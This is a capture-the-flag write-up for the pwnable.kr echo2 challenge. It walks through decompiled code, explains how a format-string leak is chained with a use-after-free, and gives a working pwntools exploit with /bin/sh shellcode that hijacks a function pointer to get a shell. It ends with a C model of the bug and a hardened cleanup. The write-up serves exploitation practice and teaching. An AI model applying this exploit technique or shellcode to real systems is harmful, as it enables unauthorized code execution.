@ihciah
Created February 10, 2016 14:27
Pwnable.kr echo2 writeup

ihciah@gmail.com

An FSB (format string bug) and a UAF (use-after-free) are used together in this simple problem.

Let's have a look at it.

```c
int __cdecl main(int argc, const char **argv, const char **envp)
{
  int *v3; // rsi@1
  _QWORD *v4; // rax@1
  int v6; // [sp+Ch] [bp-24h]@1
  _QWORD v7[4]; // [sp+10h] [bp-20h]@1

  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 1, 0LL);
  o = malloc(40uLL);
  *((_QWORD *)o + 3) = greetings;
  *((_QWORD *)o + 4) = byebye;
  printf("hey, what's your name? : ", 0LL);
  v3 = (int *)v7;
  __isoc99_scanf("%24s", v7);
  v4 = o;
  *(_QWORD *)o = v7[0];
  v4[1] = v7[1];
  v4[2] = v7[2];
  id = v7[0];
  getchar();
  func[0] = (__int64)echo1;
  func_1_ = (__int64)echo2;
  func_2_ = (__int64)echo3;
  v6 = 0;
  do
  {
    while ( 1 )
    {
      while ( 1 )
      {
        puts("\n- select echo type -");
        puts("- 1. : BOF echo");
        puts("- 2. : FSB echo");
        puts("- 3. : UAF echo");
        puts("- 4. : exit");
        printf("> ", v3);
        v3 = &v6;
        __isoc99_scanf("%d", &v6);
        getchar();
        if ( (unsigned int)v6 > 3 )
          break;
        ((void (__fastcall *)(const char *, int *))func[(unsigned __int64)(unsigned int)(v6 - 1)])("%d", &v6);
      }
      if ( v6 == 4 )
        break;
      puts("invalid menu");
    }
    cleanup();
    printf("Are you sure you want to exit? (y/n)", &v6);
    v6 = getchar();
  }
  while ( v6 != 121 );
  puts("bye");
  return 0;
}
```

cleanup() calls free(o) but does not clear the pointer. So if you select 4 to exit and then cancel at the confirmation, o has already been freed, yet it is still used in the following step when you press 2.

echo3 calls malloc(32); that size is small enough that the allocator hands back the same block freed by cleanup(). We can use this to modify the address of greetings stored at o+3*8.

Since NX is disabled, our shellcode can be written into the name buffer, and we can leak its address through the FSB. After that, just overwrite greetings and trigger it to get a shell.

```python
# shellcode: https://www.exploit-db.com/exploits/36858/
# ihciah@gmail.com
from pwn import *
shellcode="\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56"
shellcode+="\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
leak="%10$p"
#sh=process("/home/c/ctf/echo2")
sh=remote("pwnable.kr",9011)
sh.recvuntil(":")
sh.sendline(shellcode)
print sh.recvuntil("> ")
sh.sendline("2")
sh.recvline()
sh.sendline(leak)
addr=sh.recvline().strip()
assert(addr.startswith("0x"))
name=int(addr,16)-0x20
sh.recvuntil(">")
sh.sendline("4")
sh.sendline("n")
sh.recvuntil(">")
sh.sendline("3")
sh.recvline()
sh.sendline("A"*24+p64(name))
sh.interactive()
```
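The use-after-free described above, as an added example that is not part of the writeup or of the challenge's code: a C model of the 40-byte object with its two function pointers, a cleanup that drops the reference when it frees (the step the binary's cleanup() lacks), and a check of whether a malloc(32) right after the free lands on the same chunk. The struct and function names are assumptions made here.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Model of the echo2 heap object (assumed layout, built from the
 * decompilation: malloc(40), greetings at o+3*8, byebye at o+4*8). */
struct echo_obj {
    char name[24];
    void (*greetings)(void);
    void (*byebye)(void);
};

static struct echo_obj *o;   /* global, like the binary's o */
int greet_calls;             /* counts dispatches through o->greetings */

static void greetings(void) { greet_calls++; }

void init_obj(const char *name) {
    o = calloc(1, sizeof *o);
    strncpy(o->name, name, sizeof o->name - 1);
    o->greetings = greetings;
}

/* Hardened cleanup: the binary's cleanup() frees o but keeps the pointer,
 * so a cancelled exit leaves it dangling; here the reference goes too. */
void cleanup_safe(void) { free(o); o = NULL; }

/* Dispatch through the object; -1 when there is no live object. */
int call_greetings(void) {
    if (o == NULL) return -1;
    o->greetings();
    return 0;
}

/* Does a malloc(32) right after freeing a 40-byte object get the same
 * chunk? That is the reuse echo3 relies on; result is allocator dependent. */
int reuse_after_free(void) {
    struct echo_obj *old = malloc(sizeof *o);
    free(old);
    char *buf = malloc(32);
    int same = (void *)buf == (void *)old;
    free(buf);
    return same;
}

int main(void) {
    init_obj("ihciah");
    cleanup_safe();
    printf("greetings after cleanup_safe: %d\n", call_greetings());
    printf("malloc(32) reuses freed malloc(40): %d\n", reuse_after_free());
    return 0;
}
```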